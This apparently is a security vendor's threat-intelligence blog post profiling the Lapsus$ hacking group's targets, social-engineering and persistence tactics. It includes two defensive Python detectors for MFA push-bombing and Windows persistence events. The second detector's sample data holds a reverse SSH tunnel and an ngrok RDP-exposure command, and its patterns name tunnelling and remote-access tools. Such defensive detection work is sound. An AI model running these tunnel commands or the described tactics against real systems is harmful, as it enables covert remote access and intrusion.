Placing Threat Groups Under a Microscope: Lapsus$
This report is the first in a series of blogs that will delve into the deep research the SpiderLabs Threat Intelligence team conducts daily on the major threat actor groups currently operating globally. The information gathered is part of a data repository to help SpiderLabs identify possible intrusions as it conducts threat hunts, vulnerability scans, and other offensive security tasks.
Lapsus$
Lapsus$ has been very quiet for the last two years, and it is widely believed to have disbanded, with its members either starting new groups, moving on to other threat groups, or sitting in prison. Because adversaries tend to be repetitive and reuse tactics, techniques and procedures (TTPs) that have worked before, it is worth looking back at how Lapsus$ operated when it was fully active.
Lapsus$ was a loosely organized international hacking group whose members appeared to have been located in the United Kingdom and Brazil. Lapsus$ was primarily financially motivated, which led it to target large enterprises by stealing their data to sell or use to extort money from its victims. Its list of targets included Microsoft, NVIDIA, Samsung, Vodafone, Okta, Ubisoft, and T-Mobile.
Microsoft tracks the group as Strawberry Tempest (formerly DEV-0537). Lapsus$ primarily targeted organizations in Latin America, Europe, and North America.
Despite being mainly financially driven, Lapsus$ may sometimes have had an ideological bent when choosing a target, most notably the Brazilian Ministry of Health, whose COVID-19 policies the group had previously expressed anger about.
Lapsus$ generally operated on its own, but it had several known associated groups:
- Yanluowang: A ransomware-affiliated group first observed in October 2021. Its apparent Chinese connection is a ruse; leaked chat logs show its members communicating in Russian. Yanluowang is known to target the financial, manufacturing, IT, consultancy, and engineering sectors.
- 0ktapus: A financially motivated group focused on gaining access to corporate services, stealing cryptocurrency account information, and stealing source code. It ran a large phishing campaign targeting Okta credentials in 2022.
- Karakurt: A data extortion subgroup of CONTI that threatens to publicly disclose or auction stolen data unless the victim pays.
- Newgen Team: A group focused on data exfiltration and ransomware. It split from LAPSUS$ in 2022 and developed new tradecraft to complement the tools it already had.
- #NotLapsus: A group with known alliances with LAPSUS$ members.
Lapsus$' Best Known Attacks
The first known victim of the Lapsus$ group was the Brazilian Ministry of Health, attacked in December 2021. The attack took down multiple systems and forced the Brazilian government to put new health requirements for travelers in place. The group posted a message stating that it had stolen internal data and telling the ministry to contact the group to have the data returned.
A few days later, the group removed the message. Aside from the health ministry, the group also attacked Brazil's postal service and Localiza Rent a Car. In October 2022, Brazilian authorities made a key arrest of a person accused of being a Lapsus$ member.
At the start of 2022, Lapsus$ pivoted to targeting high-profile companies, starting with Okta. The group first went after Sitel, a third-party customer support provider for Okta, as a route into Okta's support tooling. It compromised a Sitel support engineer's laptop, which potentially exposed 366 Okta customers. The compromise began on January 16; the group evaded detection for several days and created a malicious email transport rule that forwarded all mail within Sitel's environment to attacker-controlled accounts.
In February 2022, the group breached NVIDIA and stole roughly 250GB of data containing information on recent GPUs. The group threatened to leak the data if the company refused to remove the cryptocurrency-mining limiter (LHR) on its recent graphics cards.
In March 2022, Lapsus$ moved on to stealing source code, including Samsung Galaxy source code and Microsoft's Bing and Cortana. The group claimed to have taken 200GB of data from Samsung; Samsung reported that the breach included no personal information of customers or employees. Lapsus$ alleged it stole 37GB of data from Microsoft after compromising a single account.
Also in March 2022, Ubisoft was allegedly breached by the gang, causing temporary disruption to its services, games, and systems. Lapsus$ stated that it was not targeting Ubisoft customer data. As a precaution, Ubisoft initiated a company-wide password reset.
How Lapsus$ Gains Initial Access
Like most threat groups, Lapsus$ used tried and true techniques to gain access to its targets. As noted earlier, it is important to remain on guard against these methods even if Lapsus$ itself is no longer operating.
Lapsus$ had strong social engineering skills. It relied heavily on phishing and spearphishing and used SIM swapping as part of its initial access toolkit. The group targeted employees' mobile phones, especially those running authenticator apps, and used SMS phishing against them. It crafted phishing emails tailored to specific organizations. The goal of these attacks was usually to compromise employee credentials, which in turn gave access to critical systems and data.
Additional tactics include:
- Reconnaissance on publicly available data about targets, such as employee details, department structures, business processes, workflows, and business relationships. With enough of this information, the group could convincingly impersonate legitimate personnel and extract further details about its targets.
- MFA prompt spamming: sending a flood of MFA push prompts until the user approves one. Also called MFA fatigue, this is most effective at unexpected or inconvenient hours, such as the middle of the night, when an unsuspecting staffer is more likely to accept a prompt just to make it stop.
- Impersonating help desk personnel over chat and encouraging employees to approve MFA prompts.
- Convincing employees to visit malicious websites or install remote access tools that let the threat actors take control of the system remotely.
- Insider recruitment: offering monetary incentives to employees of the targeted organization. In exchange, the insider hands over credentials, approves MFA requests, or performs malicious actions on the threat actors' instructions.
- Vulnerability exploitation.
- Initial Access Brokers (IABs): IABs steal and sell access to victim networks. Once they have obtained access and supporting information such as passwords and exploitable vulnerabilities, they sell it on online forums.
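The MFA fatigue technique described above leaves a very recognizable trace in identity-provider logs: a burst of push prompts to one user, often off-hours and from an unfamiliar IP, that ends in a single approval. The following detector is an added example written for this page, not SpiderLabs tooling. It runs over a constructed, simplified JSON-lines log (fields `ts`, `user`, `event`, `result`, `ip`); real Okta System Log or Entra ID sign-in exports use different field names and would need a small mapping layer. The burst threshold and off-hours window are tuning assumptions.

```python
"""Detect MFA-fatigue (push-bombing) bursts in identity-provider sign-in logs."""
from collections import defaultdict
from datetime import datetime, timedelta
import json

# Tuning assumptions: 5+ push prompts to one user inside 10 minutes is far above
# normal interactive use; 00:00-05:59 is treated as off-hours for this workforce.
BURST_THRESHOLD = 5
WINDOW = timedelta(minutes=10)
OFF_HOURS = range(0, 6)

# Constructed sample log (not real telemetry): a bot hammers 'alice' at 02:xx UTC
# until she approves; 'bob' shows normal daytime use.
SAMPLE_LOG = """
{"ts": "2022-01-20T02:10:31Z", "user": "alice", "event": "user.authentication.password", "result": "SUCCESS", "ip": "203.0.113.7"}
{"ts": "2022-01-20T02:11:02Z", "user": "alice", "event": "mfa.push", "result": "DENIED", "ip": "203.0.113.7"}
{"ts": "2022-01-20T02:11:40Z", "user": "alice", "event": "mfa.push", "result": "DENIED", "ip": "203.0.113.7"}
{"ts": "2022-01-20T02:12:15Z", "user": "alice", "event": "mfa.push", "result": "TIMEOUT", "ip": "203.0.113.7"}
{"ts": "2022-01-20T02:12:50Z", "user": "alice", "event": "mfa.push", "result": "DENIED", "ip": "203.0.113.7"}
{"ts": "2022-01-20T02:13:30Z", "user": "alice", "event": "mfa.push", "result": "DENIED", "ip": "203.0.113.7"}
{"ts": "2022-01-20T02:14:10Z", "user": "alice", "event": "mfa.push", "result": "APPROVED", "ip": "203.0.113.7"}
{"ts": "2022-01-20T02:14:12Z", "user": "alice", "event": "session.start", "result": "SUCCESS", "ip": "203.0.113.7"}
{"ts": "2022-01-20T09:00:05Z", "user": "bob", "event": "mfa.push", "result": "APPROVED", "ip": "198.51.100.20"}
{"ts": "2022-01-20T14:02:44Z", "user": "bob", "event": "mfa.push", "result": "APPROVED", "ip": "198.51.100.20"}
"""


def parse_log(text):
    """Parse JSON lines into dicts with timezone-aware timestamps, oldest first."""
    events = []
    for line in text.strip().splitlines():
        rec = json.loads(line)
        rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
        events.append(rec)
    return sorted(events, key=lambda r: r["ts"])


def detect_mfa_fatigue(events, threshold=BURST_THRESHOLD, window=WINDOW):
    """Return one finding per burst of >= threshold push prompts inside `window`.

    Each finding records whether the burst ended with an approval (the user gave
    in, so treat the session as compromised) and whether it landed off-hours.
    """
    by_user = defaultdict(list)
    for e in events:
        if e["event"] == "mfa.push":
            by_user[e["user"]].append(e)

    findings = []
    for user, pushes in by_user.items():
        i = 0
        while i < len(pushes):
            # Extend j as far as the window allows from pushes[i].
            j = i
            while j + 1 < len(pushes) and pushes[j + 1]["ts"] - pushes[i]["ts"] <= window:
                j += 1
            burst = pushes[i:j + 1]
            if len(burst) >= threshold:
                findings.append({
                    "user": user,
                    "count": len(burst),
                    "first": burst[0]["ts"],
                    "last": burst[-1]["ts"],
                    "approved_after_burst": any(p["result"] == "APPROVED" for p in burst),
                    "off_hours": burst[-1]["ts"].hour in OFF_HOURS,
                    "source_ips": sorted({p["ip"] for p in burst}),
                })
                i = j + 1  # skip past this burst and look for another
            else:
                i += 1
    return findings


def run(log_text=SAMPLE_LOG):
    return detect_mfa_fatigue(parse_log(log_text))


if __name__ == "__main__":
    for f in run():
        verdict = "probable account compromise" if f["approved_after_burst"] else "push-bombing attempt"
        when = ", off-hours" if f["off_hours"] else ""
        print(f"{f['user']}: {f['count']} pushes {f['first']:%H:%M}-{f['last']:%H:%M}Z "
              f"from {', '.join(f['source_ips'])} ({verdict}{when})")
```

On the sample data the detector flags alice (six prompts in about three minutes at 02:11 UTC, ending in an approval) and ignores bob. In production, an approved burst should trigger session revocation and a credential reset, not just an alert, and the response should assume the password was already known to the attacker since push prompts only fire after a correct password.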
Organizations need to know these tactics because they are a roadmap for how attackers get in. Knowing them also points directly at the defenses that matter: phishing-resistant or number-matching MFA, training employees to recognize help desk impersonation and unexpected MFA prompts, regular vulnerability scanning, and monitoring for anomalous activity on the network so attacks are caught before they cause harm.
Understanding how Lapsus$ operated can also help an organization recognize when it cannot adequately defend against these kinds of attacks on its own and where to turn for outside assistance.
Post Access Actions
Once inside their target, Lapsus$ had a well-stocked arsenal for privilege escalation, lateral movement, and maintaining persistence.
Lapsus$ escalated privileges by using improperly stored passwords and keys it found once inside a system. Employees often store credentials in plaintext rather than in a password manager, and the group took advantage of this. Because it then operated with legitimate accounts and credentials, its activity looked like normal user behavior in the forensic record.
The group also escalated privileges and moved laterally with common tooling. It used credential-dumping tools to obtain higher-privileged accounts, and it joined internal communication channels to impersonate employees and run internal social engineering attacks. It also made use of compromised AWS tokens.
Lapsus$ was known to exploit vulnerabilities for privilege escalation as well, leveraging well-known flaws in products such as Microsoft Active Directory, Microsoft Exchange Server, Confluence, Jira, and GitLab.
For persistence, Lapsus$ often created new accounts inside the victim organization so it could stay in the network. It also maintained access through legitimate and malicious remote access tooling, using reverse SSH (Secure Shell) tunnels, reverse proxies, ngrok, and rsocx to keep a communications channel open, and legitimate remote support products such as AnyDesk, LogMeIn, TeamViewer, and ThinScale. In some cases it installed malware such as Remote Access Trojans.
Finally, Lapsus$ was adept at blinding defenders. The group bypassed security detections, disabled security mechanisms, and modified host firewall rules to allow inbound remote connections.
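The persistence and evasion behaviors described in this section (new accounts, tunnelling and remote support tools, firewall changes) each generate Windows Security events, and a host that shows several of them in sequence deserves attention even though each one alone is routine IT activity. The hunt below is an added example written for this page, not SpiderLabs code. It runs over a constructed, flattened subset of Windows Security event fields (Event IDs 4720 user created, 4732 member added to local group, 4688 process created, 4946 firewall rule added); real events would come from a SIEM query or `Get-WinEvent` export, and the tool list must be tuned to whatever IT legitimately deploys.

```python
"""Hunt for account creation, remote access tooling and firewall changes in Windows Security events."""
import re
from collections import defaultdict

# Tools named in the text, matched on image name or command line. 'ssh -R' is a
# reverse SSH tunnel; ngrok and rsocx expose internal services to the internet.
TOOL_PATTERNS = {
    "ngrok": re.compile(r"\bngrok(\.exe)?\b", re.I),
    "rsocx": re.compile(r"\brsocx(\.exe)?\b", re.I),
    "reverse ssh": re.compile(r"\bssh(\.exe)?\b.*\s-R\s", re.I),
    "AnyDesk": re.compile(r"\banydesk(\.exe)?\b", re.I),
    "TeamViewer": re.compile(r"\bteamviewer(\.exe)?\b", re.I),
    "LogMeIn": re.compile(r"\blogmein", re.I),
    "ThinScale": re.compile(r"\bthinscale", re.I),
}

# Constructed sample (not real telemetry). On WS-042 a compromised user creates a
# local admin, exposes RDP through ngrok and a reverse SSH tunnel, and opens the
# firewall. SRV-DB1 and LT-017 show normal activity.
SAMPLE_EVENTS = [
    {"host": "WS-042", "id": 4720, "subject": "CORP\\jdoe", "target": "svc_backup2"},
    {"host": "WS-042", "id": 4732, "subject": "CORP\\jdoe", "target": "svc_backup2", "group": "Administrators"},
    {"host": "WS-042", "id": 4688, "subject": "CORP\\jdoe", "cmd": r"C:\Users\jdoe\Downloads\ngrok.exe tcp 3389"},
    {"host": "WS-042", "id": 4688, "subject": "CORP\\jdoe", "cmd": "ssh.exe -N -R 2222:localhost:3389 user@203.0.113.7"},
    {"host": "WS-042", "id": 4946, "subject": "CORP\\jdoe", "rule": "Allow RDP in"},
    {"host": "SRV-DB1", "id": 4688, "subject": "CORP\\svc_sql", "cmd": r"C:\Windows\System32\sqlservr.exe"},
    {"host": "LT-017", "id": 4688, "subject": "CORP\\helpdesk", "cmd": r"C:\Program Files\TeamViewer\TeamViewer.exe"},
]


def match_tool(cmdline):
    """Return the name of the first remote access / tunnelling tool matched, or None."""
    for name, pat in TOOL_PATTERNS.items():
        if pat.search(cmdline):
            return name
    return None


def hunt(events, approved_tools=frozenset()):
    """Return a list of findings; `approved_tools` suppresses tools IT sanctions."""
    findings = []
    created = set()  # (host, account) pairs created within this data set
    for e in events:
        host, who = e["host"], e["subject"]
        if e["id"] == 4720:
            created.add((host, e["target"]))
            findings.append({"host": host, "type": "new_local_account", "severity": "medium",
                             "detail": f"{who} created {e['target']}"})
        elif e["id"] == 4732 and e.get("group") == "Administrators":
            # A brand-new account going straight into Administrators is the classic backdoor.
            sev = "high" if (host, e["target"]) in created else "medium"
            findings.append({"host": host, "type": "added_to_admins", "severity": sev,
                             "detail": f"{who} added {e['target']} to Administrators"})
        elif e["id"] == 4688:
            tool = match_tool(e.get("cmd", ""))
            if tool and tool not in approved_tools:
                findings.append({"host": host, "type": "remote_access_tool", "severity": "high",
                                 "detail": f"{who} ran {tool}: {e['cmd']}"})
        elif e["id"] == 4946:
            findings.append({"host": host, "type": "firewall_rule_added", "severity": "medium",
                             "detail": f"{who} added firewall rule '{e.get('rule', '?')}'"})
    return findings


def hosts_by_signal(findings):
    """Correlate per host: more distinct finding types means higher triage priority."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f["host"]].add(f["type"])
    return sorted(by_host.items(), key=lambda kv: -len(kv[1]))


if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS, approved_tools={"TeamViewer"})
    for host, types in hosts_by_signal(results):
        print(f"{host}: {len(types)} signal types -> {', '.join(sorted(types))}")
    for f in results:
        print(f"  [{f['severity']}] {f['host']} {f['type']}: {f['detail']}")
```

With TeamViewer whitelisted, only WS-042 surfaces, and it does so with four distinct signal types, which is what separates an intrusion from a help desk session. The same correlation idea applies to the cloud side of this section: a new IAM user plus a new access key plus a security group opened to 0.0.0.0/0 in CloudTrail is the AWS equivalent of this host-level chain.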
Final Impact of Lapsus$'s Actions
As previously stated, Lapsus$ attacked primarily for financial gain, and to get paid it used almost every monetization scheme seen from well-known threat groups.
The first is the theft and compromise of data. In many instances, the group has stolen crucial data from its victims. This has multiple uses, including for extortion, ransom, and harassment purposes. For example, if the victim does not comply with a ransom demand, the group can either directly sell the stolen information in underground forums, or it can threaten to release the data publicly to place additional pressure on the victim to comply. This tactic is called the double-extortion method.
Illegal access can cause network service disruptions, such as website defacement, destruction of cloud environments, disruption of services, and disabling of internal systems.
The group also turned information gathered during lateral movement and privilege escalation into harassment. Organizations responding to its intrusions were harassed in retaliation, to stall investigations, and to silence researchers, including by publishing researchers' personal information and directing swatting attacks at them and their families.
By understanding Lapsus$'s methods, organizations can take proactive steps to mitigate the risk of being targeted.
In future installments of this series, SpiderLabs Threat Intelligence will delve deeper into other prominent threat actor groups, providing even more insights to help organizations fortify their cybersecurity posture.
ABOUT TRUSTWAVE
Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience.